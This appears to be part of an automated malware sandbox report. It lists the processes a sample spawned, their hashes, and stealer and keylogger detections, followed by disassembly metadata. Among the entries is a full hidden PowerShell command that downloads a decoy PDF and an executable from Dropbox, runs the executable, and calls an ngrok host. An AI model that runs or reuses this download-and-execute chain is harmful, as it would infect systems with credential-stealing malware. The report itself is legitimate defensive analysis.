                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1462386273.bat" "
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff749a80000
                                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Target ID:15
                                                                                                                                                                                                                                                                                  Start time:12:41:33
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Target ID:16
                                                                                                                                                                                                                                                                                  Start time:12:41:33
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -OutFile $RandomEXE ; start $RandomEXE; IWR -Uri 'https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/metadata/3280fc306b2b1b17d755c31452bd62f7'; "
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Target ID:18
                                                                                                                                                                                                                                                                                  Start time:12:41:35
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7120 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:8
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7f6160000
                                                                                                                                                                                                                                                                                  File size:1'255'976 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:76C58E5BABFE4ACF0308AA646FC0F416
                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Target ID:19
                                                                                                                                                                                                                                                                                  Start time:12:41:35
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7120 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:8
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7f6160000
                                                                                                                                                                                                                                                                                  File size:1'255'976 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:76C58E5BABFE4ACF0308AA646FC0F416
                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Target ID:20
                                                                                                                                                                                                                                                                                  Start time:12:41:42
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\1027599800.pdf
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Target ID:21
                                                                                                                                                                                                                                                                                  Start time:12:41:43
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1480 --field-trial-handle=2128,i,4843216233513846130,16606171289243587075,262144 /prefetch:3
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Target ID:22
                                                                                                                                                                                                                                                                                  Start time:12:41:44
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-GB --service-sandbox-type=collections --mojo-platform-channel-handle=3404 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:8
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Target ID:23
                                                                                                                                                                                                                                                                                  Start time:12:41:44
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=8376 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:6
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Target ID:24
                                                                                                                                                                                                                                                                                  Start time:12:41:48
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Target ID:25
                                                                                                                                                                                                                                                                                  Start time:12:41:48
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1108 --field-trial-handle=1948,i,14212657581130048292,735076137658541707,262144 /prefetch:3
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Target ID:26
                                                                                                                                                                                                                                                                                  Start time:12:41:50
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\854113748.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\854113748.exe"
                                                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                                                  File size:1'843'712 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:EB40135D3E0FE985A9E09970DC09A499
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                                                  • Detection: 26%, ReversingLabs
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Target ID:27
                                                                                                                                                                                                                                                                                  Start time:12:41:56
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Target ID:28
                                                                                                                                                                                                                                                                                  Start time:12:41:56
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1996,i,241946409549104947,2634262981403856413,262144 /prefetch:3
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Target ID:29
                                                                                                                                                                                                                                                                                  Start time:12:42:09
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\854113748.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\854113748.exe"
                                                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                                                  File size:1'843'712 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:EB40135D3E0FE985A9E09970DC09A499
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001D.00000003.2340786736.0000000002FF0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000001D.00000002.2353583074.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001D.00000003.2340562486.0000000002DD0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000001D.00000003.2337633012.00000000007B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Target ID:30
                                                                                                                                                                                                                                                                                  Start time:12:42:10
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\fontdrvhost.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\fontdrvhost.exe"
                                                                                                                                                                                                                                                                                  Imagebase:0x300000
                                                                                                                                                                                                                                                                                  File size:676'584 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:8D0DA0C5DCF1A14F9D65F5C0BEA53F3D
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000001E.00000003.2342679249.00000000033C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001E.00000003.2349410799.0000000005690000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001E.00000003.2350549832.00000000058B0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000001E.00000002.2470897649.0000000003580000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Target ID:33
                                                                                                                                                                                                                                                                                  Start time:12:42:10
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 416 -s 444
                                                                                                                                                                                                                                                                                  Imagebase:0x7b0000
                                                                                                                                                                                                                                                                                  File size:483'680 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Target ID:34
                                                                                                                                                                                                                                                                                  Start time:12:42:23
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\fontdrvhost.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\fontdrvhost.exe"
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff72c440000
                                                                                                                                                                                                                                                                                  File size:827'408 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:BBCB897697B3442657C7D6E3EDDBD25F
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Target ID:37
                                                                                                                                                                                                                                                                                  Start time:12:42:26
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\WerFault.exe -u -p 7376 -s 148
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff68c250000
                                                                                                                                                                                                                                                                                  File size:570'736 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Target ID:38
                                                                                                                                                                                                                                                                                  Start time:12:42:28
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6708 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:8
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                                                    Function 00007FFD9B7F33B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2101226076.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b7f0000_powershell.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: 89cf490454d7bf4db362622e3d2b8a85fcc481bc01f27d3ca7e3566b79ed4113
                                                                                                                                                                                                                                                                                    • Instruction ID: f015c6d8f1291ae9f9a84129c24d6f916cfece872e45c549876b83854877da12
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 89cf490454d7bf4db362622e3d2b8a85fcc481bc01f27d3ca7e3566b79ed4113
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D001A73020CB0C4FD748EF0CE051AA5B7E0FF85360F10056DE58AC36A1DA32E882CB45

                                                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                                                    Function 00007FFD9B8B2E55 Relevance: .4, Instructions: 433COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000010.00000002.2285912926.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9b8b0000_powershell.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: f64b84709659ad373f7413bee59388425f084017088a2738a75abdafa69b3972
                                                                                                                                                                                                                                                                                    • Instruction ID: 77f85f0e9bcbd83e5a797db128c822d4ec641851054726b90810ff9d311a412c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f64b84709659ad373f7413bee59388425f084017088a2738a75abdafa69b3972
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2ED16872B0EA9E0FEBA5ABB858655B57FA1EF19314B0900FFD04DC71E3D918A901C781
                                                                                                                                                                                                                                                                                    Function 00007FFD9B7E9A2D Relevance: .3, Instructions: 346COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000010.00000002.2285175224.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9b7e0000_powershell.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: fc9c4db6552a92a9f9ded3ae54f4ea3f5943887c2b65ac2fd65ee1f564719ee4
                                                                                                                                                                                                                                                                                    • Instruction ID: 18d5da3f57a1c4e90e00da2e9100d37c68ee3af309b6a1bd1fb7038ee4e4a72d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc9c4db6552a92a9f9ded3ae54f4ea3f5943887c2b65ac2fd65ee1f564719ee4
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 45B1C062A0E79D4FEB65EA6888696FC7BB0EF52310F0542FAC08DC71B3DD3469458B40
                                                                                                                                                                                                                                                                                    Function 00007FFD9B7E9AAD Relevance: .3, Instructions: 299COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000010.00000002.2285175224.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9b7e0000_powershell.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: c88023f6194f15ccef4295201e350dc6931de88c8680afd8b19783232e33caf2
                                                                                                                                                                                                                                                                                    • Instruction ID: a98acbc0e2769bfe678f7c4f884191634c2a53fb29b1bb936515d5f083977956
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c88023f6194f15ccef4295201e350dc6931de88c8680afd8b19783232e33caf2
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46A1C072A0D69D4FEB65EB6888697EC7BB0EF52310F0442EAC09DC71A3DE3469458B41
                                                                                                                                                                                                                                                                                    Function 00007FFD9B7EA399 Relevance: .2, Instructions: 159COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000010.00000002.2285175224.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9b7e0000_powershell.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: ca233409adb7bce15e3128068cd7ca505cbfc117fdafb553173fcfee44554721
                                                                                                                                                                                                                                                                                    • Instruction ID: df18c05528d17706277a9daa6024d1181239a211d5ba96f312ca72cb4c6e979b
